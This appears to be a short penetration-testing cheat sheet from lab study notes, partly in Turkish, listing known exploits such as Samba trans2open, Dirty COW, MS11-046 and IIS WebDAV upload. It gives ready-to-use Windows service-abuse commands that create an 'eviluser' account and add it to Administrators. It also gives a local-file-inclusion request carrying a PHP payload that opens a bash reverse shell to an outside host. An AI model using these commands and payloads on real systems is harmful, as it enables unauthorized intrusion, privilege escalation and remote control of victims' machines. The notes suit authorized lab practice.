Common Exploits
Samba trans2open Overflow (Linux x86) / 10.11.1.22
This exploits the buffer overflow found in Samba versions 2.2.0 to 2.2.8.
dirty cow exploit
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (/etc/passwd Method)
Linux Kernel 2.6.39 < 3.2.2 - 'Mempodipper' Local Privilege Escalation
Webdav exploit
windows/iis/iis_webdav_upload_asp
linux/samba/trans2open (Samba 2.2.x) - exploitdb-link Samba < 2.2.8
samba servisine yönelik kullanılacak exploit
Exploit Title: Windows x86 (all versions) AFD privilege escalation (MS11-046) win7/winserver2008 ve öncesi oslarda çalışıyor. - afd.sys Privilege Escalation (MS14-040), PoC
accesschk.exe
# sc config upnphost binpath= "net eviluser testxlab Password1 /add"
# sc config upnphost binpath= "net localgroup Administrators eviluser /add"
# sc stop upnphost
# sc start upnphost
Servisin Config Ayarlarını Görmek için
# sc qc upnphost
Servislerin izin kontrolleri
# accesschk-xp.exe -uwcqv "Authenticated Users" * /accepteula
kullanımı yazılacak
Notlar
Windows xp, xp sp1, sp2 gibi sistemlerde upnphost servisi üzerinden hak ve yetki yükseltebilirsin.
LFI to RCE
POST /section.php?page=php://input%00
[HTTP POST DATA]
<?php echo shell_exec("bash -i >& /dev/tcp/10.11.0.94/443 0>&1 2>&1"); ?>
ms11-080
##
Last updated
Was this helpful?